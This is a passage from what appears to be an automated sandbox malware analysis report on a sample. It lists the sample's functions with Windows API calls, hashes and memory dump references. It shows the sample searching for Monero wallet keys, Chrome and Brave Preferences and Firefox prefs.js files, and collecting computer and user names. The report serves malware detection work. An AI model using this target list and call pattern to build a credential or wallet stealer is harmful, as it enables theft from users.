                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003810F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: cd44674056fc2f07052030c4508d9d01ba6e53de6d019f04f94cea1702393ec4
                            • Instruction ID: 800b4a40c9547ab6f1e1073f157625b3221e36e6bfdd8a86ae83dda1e318d047
                            • Opcode Fuzzy Hash: cd44674056fc2f07052030c4508d9d01ba6e53de6d019f04f94cea1702393ec4
                            • Instruction Fuzzy Hash: D4F0E2B1641308BBEB14ABA4AC49FAAB7ECE705B15F300448F504E7280D5729E04DBA0
                            Function 00381190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397910
                              • Part of subcall function 003978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00397917
                              • Part of subcall function 003978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0039792F
                              • Part of subcall function 00397850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                              • Part of subcall function 00397850: RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                              • Part of subcall function 00397850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                            • ExitProcess.KERNEL32 ref: 003811C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 6b55e9db2ca6386421c13d07d61fc5bab87c4f48a2e3e8f631e12406ec8e050c
                            • Instruction ID: efc716be42fc1c0b06f9ace52067a309b9967597a2243c0c3a881fe42a4a6437
                            • Opcode Fuzzy Hash: 6b55e9db2ca6386421c13d07d61fc5bab87c4f48a2e3e8f631e12406ec8e050c
                            • Instruction Fuzzy Hash: 49E012B592430557CE0173B0AC0FF2A379C9B6534DF040465FA05D6142FA25E805966A

                            Non-executed Functions

                            Function 003938B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 003938CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 003938E3
                            • lstrcat.KERNEL32(?,?), ref: 00393935
                            • StrCmpCA.SHLWAPI(?,003A0F70), ref: 00393947
                            • StrCmpCA.SHLWAPI(?,003A0F74), ref: 0039395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00393C67
                            • FindClose.KERNEL32(000000FF), ref: 00393C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 95438b918410391c9fea37fc71eca75ad884f2caf3625aa7025e69796e9bc87c
                            • Instruction ID: c3a8975c45701afbfdd6477c2a058f95b87eed1f78da8170ee7784bcb7b6a0c3
                            • Opcode Fuzzy Hash: 95438b918410391c9fea37fc71eca75ad884f2caf3625aa7025e69796e9bc87c
                            • Instruction Fuzzy Hash: E5A140B19006089FDF25DFA4DC85FEA7778FB59304F044588E60DA6141EB759B88CFA2
                            Function 0038BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • FindFirstFileA.KERNEL32(00000000,?,003A0B32,003A0B2B,00000000,?,?,?,003A13F4,003A0B2A), ref: 0038BEF5
                            • StrCmpCA.SHLWAPI(?,003A13F8), ref: 0038BF4D
                            • StrCmpCA.SHLWAPI(?,003A13FC), ref: 0038BF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038C7BF
                            • FindClose.KERNEL32(000000FF), ref: 0038C7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: e9bc892d8442f81ffbfcf2cce85dced2ab5c2a07976f6540101f54c1097526a1
                            • Instruction ID: acfa79fac32e22a3d3e9d850a189269070a2ba84c4ec9f30890168540800bc32
                            • Opcode Fuzzy Hash: e9bc892d8442f81ffbfcf2cce85dced2ab5c2a07976f6540101f54c1097526a1
                            • Instruction Fuzzy Hash: BA4255729106089BDF16FBB0DD96EED777DAB54300F404698F50A9A081EF349B49CBE2
                            Function 00394910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0039492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00394943
                            • StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                            • StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                            • FindClose.KERNEL32(000000FF), ref: 00394B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 2e81663ea0b5480c4543807f6ddef3af01c6070bf2b633eee2796d0d0ca5f5c1
                            • Instruction ID: 17ecaf162a809959499993bf59871151009994cc5e72bcec8d25752c86204a09
                            • Opcode Fuzzy Hash: 2e81663ea0b5480c4543807f6ddef3af01c6070bf2b633eee2796d0d0ca5f5c1
                            • Instruction Fuzzy Hash: 6F6164B2900618AFCF25EBA0DC49EEA77BCFB59704F044588F549A6040EB759B89CF91
                            Function 00394570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00394580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00394587
                            • wsprintfA.USER32 ref: 003945A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 003945BD
                            • StrCmpCA.SHLWAPI(?,003A0FC4), ref: 003945EB
                            • StrCmpCA.SHLWAPI(?,003A0FC8), ref: 00394601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0039468B
                            • FindClose.KERNEL32(000000FF), ref: 003946A0
                            • lstrcat.KERNEL32(?,0115E858), ref: 003946C5
                            • lstrcat.KERNEL32(?,0115DAC0), ref: 003946D8
                            • lstrlen.KERNEL32(?), ref: 003946E5
                            • lstrlen.KERNEL32(?), ref: 003946F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 78eb76d3e2728e804953fdc3e252be917b39748e627dbee17545957aca917dbd
                            • Instruction ID: 9fb4a68e76a8f11cef5f80f255d5ce961b7dfaeaa695682f216887ff39fb0488
                            • Opcode Fuzzy Hash: 78eb76d3e2728e804953fdc3e252be917b39748e627dbee17545957aca917dbd
                            • Instruction Fuzzy Hash: CF5166B290021C9FCB25EBB0DC89FED777CEB58304F404588F60996190EB759B898F92
                            Function 00393EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00393EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00393EDA
                            • StrCmpCA.SHLWAPI(?,003A0FAC), ref: 00393F08
                            • StrCmpCA.SHLWAPI(?,003A0FB0), ref: 00393F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0039406C
                            • FindClose.KERNEL32(000000FF), ref: 00394081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 825499c665a6fb28f6f7ed5093a704ddb6b3af131655246e4e26740c846ba1cc
                            • Instruction ID: ac134226c8a142292185540a1a6c4351128ecff7f9b773924a59eb9737d7c940
                            • Opcode Fuzzy Hash: 825499c665a6fb28f6f7ed5093a704ddb6b3af131655246e4e26740c846ba1cc
                            • Instruction Fuzzy Hash: 4F5156B2900618AFCF25FBB0DC85EEA777CBB54704F004588F65996040EB759B8A8F91
                            Function 0038ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0038ED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 0038ED55
                            • StrCmpCA.SHLWAPI(?,003A1538), ref: 0038EDAB
                            • StrCmpCA.SHLWAPI(?,003A153C), ref: 0038EDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038F2AE
                            • FindClose.KERNEL32(000000FF), ref: 0038F2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: db1615eeeea62dd4f8f7c49b106757dc41fdd83c57e9c2490b61f211f9b56656
                            • Instruction ID: 5cb5283eba525e577deeeabbedd988c94372c50047f3a96566bf2890de7373ea
                            • Opcode Fuzzy Hash: db1615eeeea62dd4f8f7c49b106757dc41fdd83c57e9c2490b61f211f9b56656
                            • Instruction Fuzzy Hash: 1FE1F1729116189AEF56FB60CC52EEE7778AF54300F4042D9B50A66052EF306F8ADF92
                            Function 0038F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A15B8,003A0D96), ref: 0038F71E
                            • StrCmpCA.SHLWAPI(?,003A15BC), ref: 0038F76F
                            • StrCmpCA.SHLWAPI(?,003A15C0), ref: 0038F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0038FAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: c850de1f326e7325085e5567317f8e005f8b5387cead9a951ecbb7ab576a05b2
                            • Instruction ID: 345190553593bfe3a6165fd0bb3eb4775beada9ea58b0bd76d1a38f9673c7302
                            • Opcode Fuzzy Hash: c850de1f326e7325085e5567317f8e005f8b5387cead9a951ecbb7ab576a05b2
                            • Instruction Fuzzy Hash: 9DB130719106189FDF26FB60DC96EEE7779AF54300F4082A8E40A9A141EF316B49CFD2
                            Function 003816D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A510C,?,?,?,003A51B4,?,?,00000000,?,00000000), ref: 00381923
                            • StrCmpCA.SHLWAPI(?,003A525C), ref: 00381973
                            • StrCmpCA.SHLWAPI(?,003A5304), ref: 00381989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00381D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00381DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00381E20
                            • FindClose.KERNEL32(000000FF), ref: 00381E32
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
